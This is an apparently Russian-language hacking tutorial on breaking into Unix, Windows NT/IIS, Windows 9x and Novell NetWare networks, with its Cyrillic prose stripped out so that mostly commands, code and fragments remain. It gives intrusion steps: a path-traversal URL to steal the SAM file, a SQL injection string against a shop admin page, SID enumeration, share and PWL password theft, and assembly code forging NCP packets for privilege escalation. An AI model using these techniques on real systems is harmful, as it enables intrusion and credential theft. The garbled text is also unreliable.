     .
          .
   ,      .
               .
   , .

1         Unix

   TCP/IP      Internet. ,     ,           .  ,     ,      .    Internet                  .   , ,        .          WEB-  .  ,          ,                 WEB-.         .      .  ,     cgi-. ,    , ..               .   ,     . ,        .         ,        . 

 .

  ,   ,       ,        .      ,   .         : FTP-, telnet, sendmail, NFS  ..        ,      shell              .

                 (buffer overflows).         -   1988 .         .     ,  ,         ,            .        ,     . , , 9  13  CERT (Computer Emergency Response Team site)  1998        1999     .      Bugtraq ,   2/3         . ,          . ,              . 

      -    ,           .  ,     ,            .         .        .         , ,      ,     .

   . 

     IP       sendmail,    .     ,            Unix-.        ,              .       passwd         ,   rlogin, rsh   shell   . 

         Unix   .  ,        :   Sun,  SunOS 4, NIS  ,  ,    .

 NFS.

    TCP/IP         ,      Network File System (NFS).      /etc/exports      (SunOS 4.1)    . 

    NIS-     ,           passwd,     .       ,    ,   crack  .             ( ,        ). 

,      ,       .          ,           .         (cisco, wellfleet...)       Unix- (Sun, DEC, BSDI, FreeBSD). 

          . ,   /    .    rlogin, rsh, RPC (. ),   ,    2048  2049, -     NFS.     ,  ,    25   .    ,    -      ,       TCP-  .              ( . firewall -  ). 

             (software firewall).     ,         IP-,      . 

       ,   ,      (telnet, ftp...),  ,          ,              . 

 ,              ,  IP-. , IP-     IP-           . 

2        MS Windows NT/2000/XP/2003

 WinNT,   firewall'   135-139 ,  .

 1.  .

 .     ,   135-139,   WinNT.   139,      Windows 9x.    WinNT, ..   135-139 .

 2.  .  . 

              . 

      : 

)   ;

)   ;

)   .

        Legion.   ip -  192.143.198.0,    ip -  192.143.198.255. 

  . ,   .    . 

      .      23.  ,       () nbtstat   -A 192.143.198.     .    ,  ,      . 

      IP Network Browser.   . 

       telnet,    80 (http), 25 (smtp), 21 (ftp).   .    DumpACL,     Win32     . 

 3.   .

  ,    ,   cgi  ,   asp    . 

    WinNT   asp  cgi,   ,      ,      .  c asp,         asp.     ,   .   ,     Web-.            (file.asp.)       %2e,        .    ?     (), ,   xakep.ru   edit.asp  ()   ,    .          ::$DATA     .      ,     SAM.   ,    WinNT           SAM.           codebrws.asp,      SAM,     : codebrws.asp?source=/../../../../winnt/repair/sam._ 

  shopdbtest.asp,   ,        xDatabase.    . 

   ,   shopping400.mdb/shopping300.mdb   .      ,           .      vpasp/vpasp  admin/admin.   Web     .        ,        : 'or''='   shopadmin.asp.     -. 

   :

-     .   4.0, 5.0  5.1 IIS    ,         .

-     http-.

-    ?server-side includes  ISAPI ,   HTR .

  ,    :

- ,         -.       ISAPI    ,   -        FTP  FTP.

-    ?Cross-Site Scripting:       IIS,  -    http- (http error page),   -  ,     URL

        default.asp.           :      :

http://www.xxx.com/default.asp?sector=anything

: http://www.xxx.com/zzz/default.asp?sector=lamers

     :

error '80020009' Exception occurred. D:SITIOS_WEBTECTIMESNUEVOzzz../body.htm, line 74 

    ,        .

 cgi     (   ).  WinNT           Unix, ..      ,   Windows . 

 4.   SAM  .

         ,             .    guest    .     ,   ,    Unix,      root, a     admin, administrator  . 

        "",      ,     .  -   , , .           .     .      ,     .   . 

 5.  .

,             .   ,     ,  .      ,    . 

 6. .

             SAM   .      . 

  (    ).

         . ,  ,   User2Sid  Sid2User. 

:

user2sid IP-   "Power users" 

user2sid IP-   "Domain users"

   :

S - 1 - 5 - 25 - 8215467 - 1456327812 - 162345100 - 513

    :

sid2user IP-   5 25 8215467 1456327812 162345100 500

   500,   ,      Uid   0. 

    :

Name is pupkin.

     .     :

1. net view IP- 

2. nbtstat -A IP- 

3.  Legion.

4.   Enum (   NT/2000).      ,      .

:

1.   .

     Brutus       ,   Cerberus InternetScanner: http:// www.cerberus-infosec.co.uk/cis.shtml

2.   . 

     technotronic.com  securityfocus.com   WinNT (IIS - 4,5). , iishack.

3.     ,     ,    - ,    ,  ,    .         -    .       "" ,     .   ,   (lophtcrack),    .

4.    . 

    NT   ,      : NetBus, Back Orifice  SubSeven   keylogger.

5.   Unicode.

  ,   IIS 4.0  5.0    Windows NT 4.0  Windows 2000.      ,   ,  ,  ,   .   Unicode     -   -  ,      : -       - ,   .

3    

     .       , ,    ,  ,    . 

        : Microsoft Network  NowellNetware. 

     . 

  Microsoft. 

  ,    ,      Windows 95/98/ME,   ,      ,               Microsoft     .      .     . 

         Windows . 

,   . 

    ,    ... 

    ?  , .   , ,     ,    .   ,    (,   "install", "temp"),      ,   -  "obmen"  "income",     .      .       "c", "d"...   .    ,   .    .     "Windows"     *.pwl       .    ,          - . ,  oleg.pwl      ,    .   ,        .   PWL    ,         .     ,      ,      .        ,     PWL,    ... 

     PWL?  .          .   ? PWL -  "",     ,        . 

 ,   PWL,     - ,      .      ,    (  ).           .     PWL    . 

   ?      "$"   ,         .      ,     .        "C$",       . 

 . 

  ?       .    ? , ,    ,          ,   .        ,  -  . 

      - "", "comp_name emp1$" (  C).    ?     SHI50F_FULL | SHI50F_SYSTEM| SHI50F_PERSIST,      "$".  , : 
1)    . 

2)   . ..   ()   ,   . 

3)       . 

           .    ,    .      , ,    ,  .     -  "   ".     ,     .          ,     . .    .     .        .        .     HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanMan. ,     reg ,       .    ,        .    exe    . 

           ,      .      .         .  ,     (Win9x only): 

//    - char *resname, char *password 

DWORD RetVal; 

NETRESOURCE nr; 

nr.lpRemoteName=resname; 

nr.dwType=RESOURCETYPE_DISK; 

RetVal=WNetAddConnection2(&nr,password,NULL,CONNECT_UPDATE_PROFILE); 

 . 

     ,    Win9x,    .       NT,        /.      ,   .    ,   (/ -    )     NT.      ,       -         . 

       .   Win95/98/Me    .    SMB- Microsoft  , ,    ,     ,    , ,  ,       ,    .        ,      "PQWak".       .       ,   ,     "xIntruder".  ,    ,      .       ,          7 .  ,   ,     Microsoft   ,   . 

     TCP,    139-   ,     .       IPX,  .            ,     TCP,  IPX. 

  ... 

 ,          ,  , .   ( ),      TCP,  ,     .     telnet, ftp, pop3    (:       -    "   ",        "TCP_LOGGER").     "ssh", "apop"  ,          .   ,  ,  ,     SMB .      .      "LANMAN1.0"  .,    ,   "LANMAN2.1"  "NT LM 0.12"     ,  ,      hash-. , ,  ,     .      ,         ,    .         ,       . 

 . ,       NT.   L0phtCrack     "sniffing".            .       . 

     ? 

-,       NT,          Windows95/98/Me,      ,     LANMAN2.1,     ,      NT   ,   Windows9x - . 

-,  , ,   . , ,  -  ,   ,  "collision domain".  ,    ,        ,       .    ,    "collision domain"   "broadcast domain".    MAC      "route table".  ,  - ,      ,        .  (!),        MAC ,         ,      ,   ARP,  ICMP      .  ,       ...           UInC. 

   ? 

     . 

      ?      internet,    ,   -   proxy.      ,         IPX/ SPX.   proxy      TCP->SPX->TCP. (        internet  "Nowell Netware",     802.3).       -   ... , ,          . ,     "Program Files",  "Temporary Internet Files" (). 

 NowellNetware. 

     .     . 

1.  . 

 ,                Netware Core Protocol ( NCP )    IPX.         0  255    .     Sequence Number.    . 

  

    

   

---------------    ------------------ 

ReceiverAddress 6 Normal   ,

   

SenderAddress 6 Normal   ,

  

DataLength 2 High-Low  

--------------------   IPX ----------------- 

CheckSum 2 Normal  

IpxLength 2 High-Low  

HopCount 1 -  

PacketType 1 -  

DestNetwork 4 Normal   

DestNode 6 Normal   

DestSocket 2 Low-High   

SourceNetwork 4 Normal   

SourceNode 6 Normal   

SourceSocket 2 Low-High   

----------------------   NCP -------------------

RequestType 2 Low-High   

SequenceNumber 1 -  

ConectionNumberLow 1 -   

  

  

TaskNumber 1 -  .   

 .   

 .  

0   .

ConectionNumberHigh 1 -  0.

FunctionCode 1 -  

------------------   NCP ------------------------

- - -      

  .        .   ,   ,  , ,    sequence number.  -           . 

2.  . 

       ,   .         ,   ,    ..     ,         .   - sequence number,           .   ,           255    sequens numbers. 

3.    

        .     EQUEVALENT TO ME,      .    . 

    EQUEVALENT TO ME 

-------------------    --------------- 

RecAdr db 00,20h,0afh,4fh,5fh,0ah 

SndAdr db 00,20h,0afh,089h,022h,0afh 

DataLength db 01,68h 

-----------------------  IPX  ------------------- 

dw 0ffffh 

IpxLength db 01,67h 

db 0 

db 17 

DestNetwork db ?,?,?,? 

DestNode db ?,?,?,?,?,? 

DestSocket db 04,51h 

SourceNetWork db 00,00,01,02 

SourceNode db ?,?,?,?,?,? 

SourceSocket db 40h,03 

---------------------   NCP -------------------- 

db 22h,22h 

SequenceNumber db 48 

ConnectionNumberLow db 24 

db 4 

db 0 

db 68h 

db 2 

------------------------   NCP -------------------- 

dd -1 

dd 514 

S1_2: dd offset S1_1 - offset S1_2-4 

dd 0 

dd 9 

dd 0 

dd 0 

dd 0 

S1ID db 67h,02h,00,06h 

dd 1 

dd 5 

dd 34 

db 'E',0,'q',0,'u',0,'i',0,'v',0,'a',0,'l',0,'e',0 

db 'n',0,'t',0,' ',0,'T',0,'o',0,' ',0,'M',0,'e',0 

dd 0 

dd 1 

dd 26 

db '3',0,'1',0,'0',0,'5',0,'.',0,'I',0,'N',0,'F',0 

db '.',0,'T',0,'S',0,'U',0 

S1_1: 

  , , , ID,   -  . . 

   

ah=E3h 

ds:si=> ConReq 

dw 2 -  

db 16h -  

db ? -   

es:di=> ConRep 

dw 62 -  

db 4 dup (?) 

dw ? -   

db 56 duo (?) -   

int 21h 

     IPX  ( 9),            .  ,       .      LSL ,    .    -   ODIPKT  ( 4).    Odipkt 

ah=4 

cx= 

ds:si=> 

int 60h 

C=1   

   

Send proc 

mov SequenceNumber,0 

@@1: push ds 

push es 

mov ah,4 

mov cx,Length 

mov si,offset Packet 

int 60h 

pop es 

pop ds 

jc @@1 

mov cx,1000 

loop $-2 

dec SequenceNumber 

jne @@1 

ret 

Send endp 

4..

          1 sequence number".            ,  .      255*256 . 




           . 




,      .       ,      . ,         ,       . 

  : 

1.     :   ,       ,   . 

2.  ,   . 

3.  . 

4.     . 

5.     . 

6.           .  ,    :    , . 
The End...